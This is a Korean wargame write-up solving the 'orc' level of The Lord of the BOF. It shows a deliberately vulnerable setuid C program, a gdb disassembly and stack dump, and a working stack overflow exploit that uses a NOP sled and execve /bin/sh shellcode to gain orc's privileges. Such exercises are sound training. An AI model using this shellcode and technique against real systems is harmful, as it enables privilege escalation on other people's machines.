http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=8606 [복사]
[C:\~]$ telnet 192.168.0.22
Connecting to 192.168.0.22:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
_______________________
_______________________------------------- `\
/:--__ |
||< > | ___________________________/
| \__/_________________------------------- |
| |
| The Lord of the BOF : The Fellowship of the BOF, 2010 |
| |
| |
| [enter to the dungeon] |
| gate : gate |
| |
| [RULE] |
| - do not use local root exploit |
| - do not use LD_PRELOAD to my-pass |
| - do not use single boot [h4ck3rsch001] |
| ____________________|_
| ___________________------------------------- `\
|/`--_ |
||[ ]|| ___________________/
\===/___________________--------------------------
login: goblin
Password:
[goblin@localhost goblin]$ bash2
[goblin@localhost goblin]$ ls -al
total 52
drwx------ 2 goblin goblin 4096 Jul 1 15:05 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw------- 1 goblin goblin 78 Jul 1 15:05 .bash_history
-rw-r--r-- 1 goblin goblin 24 Feb 26 2010 .bash_logout
-rw-r--r-- 1 goblin goblin 230 Feb 26 2010 .bash_profile
-rw-r--r-- 1 goblin goblin 124 Feb 26 2010 .bashrc
-rwxr-xr-x 1 goblin goblin 333 Feb 26 2010 .emacs
-rw-r--r-- 1 goblin goblin 3394 Feb 26 2010 .screenrc
-rwsr-sr-x 1 orc orc 12567 Feb 26 2010 orc
-rw-r--r-- 1 root root 505 Mar 29 2010 orc.c
[goblin@localhost goblin]$ cat orc.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orc
- egghunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
/*
 * Challenge binary for the "orc" level (theme: egghunter).  It is installed
 * setuid/setgid to user `orc` (see the `ls -al` output above), so any code
 * that runs inside it runs with orc's effective uid/gid.
 *
 * Deliberate weaknesses, from a reviewer's point of view:
 *   - `main` has no return type (implicit int, pre-C99 style), and
 *     memset/strlen/strcpy are called without <string.h>, so they are
 *     implicitly declared.
 *   - argv[1][47] is read before the length of argv[1] is ever checked
 *     (out-of-bounds read when argv[1] is shorter than 48 bytes).
 *   - argv[1] is copied into a 40-byte stack buffer with an unbounded
 *     strcpy: a classic stack buffer overflow.  The hardening a maintainer
 *     would apply is a length check followed by a bounded copy
 *     (e.g. snprintf/strncpy with sizeof(buffer)), plus `int main`.
 */
main(int argc, char *argv[])
{
    char buffer[40];   /* at ebp-40 in the disassembly; the frame reserves 44 bytes for buffer + i */
    int i;
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    // egghunter: overwrite every environment string with zeros in place, so
    // nothing placed in the environment survives into the rest of the
    // program.  Only the string bodies are wiped; the environ pointer array
    // itself is left as is.
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));
    // Require byte 47 of argv[1] to be 0xbf.  On this layout (40-byte buffer,
    // then saved frame pointer, then return address at bytes 44..47) byte 47
    // is the most significant byte of whatever lands on the return address,
    // so this pins it to the 0xbfxxxxxx stack range.  No length check
    // precedes this index.
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);   /* unbounded copy into buffer[40]: the overflow */
    printf("%s\n", buffer);
}
===============================
소스 코드를 보면 argv[1][47]이 \xbf값이어야한다.
buffer[0]~[39]까진 임의의값
[40]~[43]까진 sfp, [44]~[48]까진 리턴 어드레스 값이다.
[48]은 \xbf가 들어가야 되는데...
뭐... 여지껏 풀었으면 당연하게 느껴질 것이다.
문제는 환경변수를 이용한 environment값이 초기화가 된다는 것이다.
그렇다면 페이로드를...
0~43 | 44 ~ 47 | 48 ~ 148 | 149~
nop | ret | nop | 쉘코드
즉, buffer[47]이후에 nop을 100개정도 넣고
그 뒤에 쉘코드를 페이로드로 설정하면 된다.
===============================
[goblin@localhost goblin]$ mkdir tmp
[goblin@localhost goblin]$ ls
orc orc.c tmp
[goblin@localhost goblin]$ cp orc tmp
[goblin@localhost goblin]$ cd tmp
[goblin@localhost tmp]$ ls
orc
[goblin@localhost tmp]$ gdb -q orc
(gdb) set disassembly intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %ebp,%esp
0x8048503 <main+3>: sub %esp,44
0x8048506 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push 0x8048630
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add %esp,4
0x8048519 <main+25>: push 0
0x804851b <main+27>: call 0x8048420 <exit>
0x8048520 <main+32>: add %esp,4
0x8048523 <main+35>: nop
0x8048524 <main+36>: mov DWORD PTR [%ebp-44],0x0
0x804852b <main+43>: nop
0x804852c <main+44>: lea %esi,[%esi*1]
0x8048530 <main+48>: mov %eax,DWORD PTR [%ebp-44]
0x8048533 <main+51>: lea %edx,[%eax*4]
0x804853a <main+58>: mov %eax,%ds:0x8049750
0x804853f <main+63>: cmp DWORD PTR [%eax+%edx],0
0x8048543 <main+67>: jne 0x8048547 <main+71>
0x8048545 <main+69>: jmp 0x8048587 <main+135>
0x8048547 <main+71>: mov %eax,DWORD PTR [%ebp-44]
0x804854a <main+74>: lea %edx,[%eax*4]
0x8048551 <main+81>: mov %eax,%ds:0x8049750
0x8048556 <main+86>: mov %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>: push %edx
0x804855a <main+90>: call 0x80483f0 <strlen>
0x804855f <main+95>: add %esp,4
0x8048562 <main+98>: mov %eax,%eax
0x8048564 <main+100>: push %eax
0x8048565 <main+101>: push 0
0x8048567 <main+103>: mov %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>: lea %edx,[%eax*4]
0x8048571 <main+113>: mov %eax,%ds:0x8049750
0x8048576 <main+118>: mov %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>: push %edx
0x804857a <main+122>: call 0x8048430 <memset>
0x804857f <main+127>: add %esp,12
0x8048582 <main+130>: inc DWORD PTR [%ebp-44]
---Type <return> to continue, or q <return> to quit---
0x8048585 <main+133>: jmp 0x8048530 <main+48>
0x8048587 <main+135>: mov %eax,DWORD PTR [%ebp+12]
0x804858a <main+138>: add %eax,4
0x804858d <main+141>: mov %edx,DWORD PTR [%eax]
0x804858f <main+143>: add %edx,47
0x8048592 <main+146>: cmp BYTE PTR [%edx],0xbf
0x8048595 <main+149>: je 0x80485b0 <main+176>
0x8048597 <main+151>: push 0x804863c
0x804859c <main+156>: call 0x8048410 <printf>
0x80485a1 <main+161>: add %esp,4
0x80485a4 <main+164>: push 0
0x80485a6 <main+166>: call 0x8048420 <exit>
0x80485ab <main+171>: add %esp,4
0x80485ae <main+174>: mov %esi,%esi
0x80485b0 <main+176>: mov %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>: add %eax,4
0x80485b6 <main+182>: mov %edx,DWORD PTR [%eax]
0x80485b8 <main+184>: push %edx
0x80485b9 <main+185>: lea %eax,[%ebp-40]
0x80485bc <main+188>: push %eax
0x80485bd <main+189>: call 0x8048440 <strcpy>
0x80485c2 <main+194>: add %esp,8
0x80485c5 <main+197>: lea %eax,[%ebp-40]
0x80485c8 <main+200>: push %eax
0x80485c9 <main+201>: push 0x8048659
0x80485ce <main+206>: call 0x8048410 <printf>
0x80485d3 <main+211>: add %esp,8
0x80485d6 <main+214>: leave
0x80485d7 <main+215>: ret
0x80485d8 <main+216>: nop
0x80485d9 <main+217>: nop
0x80485da <main+218>: nop
0x80485db <main+219>: nop
0x80485dc <main+220>: nop
0x80485dd <main+221>: nop
0x80485de <main+222>: nop
0x80485df <main+223>: nop
End of assembler dump.
(gdb) b *main+189
Breakpoint 1 at 0x80485bd
(gdb) r `python -c 'print "\x90"*44+"\xbf"*4+"\x90"*100+
Starting program: /home/goblin/tmp/orc `python -c 'print "\x90"*44+"\xbf"*4+"\x90"*100+
/bin/bash: unexpected EOF while looking for ``'
/bin/bash: -c: line 2: syntax error
Program exited with code 02.
You can't do that without a process to debug.
(gdb) r `python -c 'print "\x90"*44+"\xbf"*4+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Starting program: /home/goblin/tmp/orc `python -c 'print "\x90"*44+"\xbf"*4+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Breakpoint 1, 0x80485bd in main ()
(gdb) x/512x $esp
0xbffffa04: 0xbffffa10 0xbffffb99 0x00000017 0xbffffa38
0xbffffa14: 0x4000a970 0x400f855b 0x08049680 0x4000ae60
0xbffffa24: 0xbffffa84 0xbffffa38 0x080484eb 0x0804966c
0xbffffa34: 0x08049680 0xbffffa58 0x400309cb 0x00000002
0xbffffa44: 0xbffffa84 0xbffffa90 0x40013868 0x00000002
0xbffffa54: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffffa64: 0x00000002 0xbffffa84 0x08048390 0x0804860c
0xbffffa74: 0x4000ae60 0xbffffa7c 0x40013e90 0x00000002
0xbffffa84: 0xbffffb84 0xbffffb99 0x00000000 0xbffffc47
0xbffffa94: 0xbffffc69 0xbffffc73 0xbffffc81 0xbffffca0
0xbffffaa4: 0xbffffcaf 0xbffffcc7 0xbffffce3 0xbffffd02
0xbffffab4: 0xbffffd0d 0xbffffd1b 0xbffffd5d 0xbffffd71
0xbffffac4: 0xbffffd83 0xbffffd98 0xbffffda8 0xbffffdb4
0xbffffad4: 0xbffffdd2 0xbffffdeb 0xbffffdf6 0xbffffe07
0xbffffae4: 0xbffffe1c 0xbffffe24 0x00000000 0x00000003
0xbffffaf4: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffb04: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffb14: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffb24: 0x08048450 0x0000000b 0x000001f7 0x0000000c
0xbffffb34: 0x000001f7 0x0000000d 0x000001f7 0x0000000e
0xbffffb44: 0x000001f7 0x00000010 0x0febfbff 0x0000000f
0xbffffb54: 0xbffffb7f 0x00000000 0x00000000 0x00000000
0xbffffb64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb74: 0x00000000 0x00000000 0x69000000 0x00363836
0xbffffb84: 0x6d6f682f 0x6f672f65 0x6e696c62 0x706d742f
0xbffffb94: 0x63726f2f 0x90909000 0x90909090 0x90909090
0xbffffba4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbb4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbc4: 0xbfbfbf90 0x909090bf 0x90909090 0x90909090
0xbffffbd4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbe4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbf4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc04: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc14: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc24: 0x90909090 0x90909090 0x50c03190 0x732f2f68
0xbffffc34: 0x622f6868 0xe3896e69 0xe1895350 0x0bb0c289
0xbffffc44: 0x000080cd 0x00000000 0x00000000 0x00000000
0xbffffc54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffda4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffde4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffea4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffec4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffed4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffee4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffef4: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbfffff04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffa4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffe4: 0x2f000000 0x656d6f68 0x626f672f 0x2f6e696c
0xbffffff4: 0x2f706d74 0x0063726f 0x00000000 Cannot access memory at address 0xc0000000
(gdb) exit
Undefined command: "exit". Try "help".
(gdb) exit
Undefined command: "exit". Try "help".
(gdb) q
The program is running. Exit anyway? (y or n) y
[goblin@localhost tmp]$ cd ..
[goblin@localhost goblin]$ ls
orc orc.c tmp
[goblin@localhost goblin]$ ./orc `python -c 'print "\x90"*44+"\xd4\xfb\xff\xbf"+"\[goblin@localhost goblin]$ ./orc `python -c 'print "\x90"*44+"\xd4\xfb\xff\xbf"+"\[goblin@localhost goblin]$ ./orc `python -c 'print "\x90"*44+"\xd4\xfb\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89[goblin@localhost goblin]$ ./orc `python -c 'print "\x90"*44+"\xd4\xfb\xff\xbf"+"\
[goblin@localhost goblin]$ ./orc `python -c 'print "\x90"*44+"\xd4\xfb\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
?y¢¯1??h//shh/bin??¡Æ
?
bash$ my-pass
euid = 504
[????????????????]
bash$ id
uid=503(goblin) gid=503(goblin) euid=504(orc) egid=504(orc) groups=503(goblin)
bash$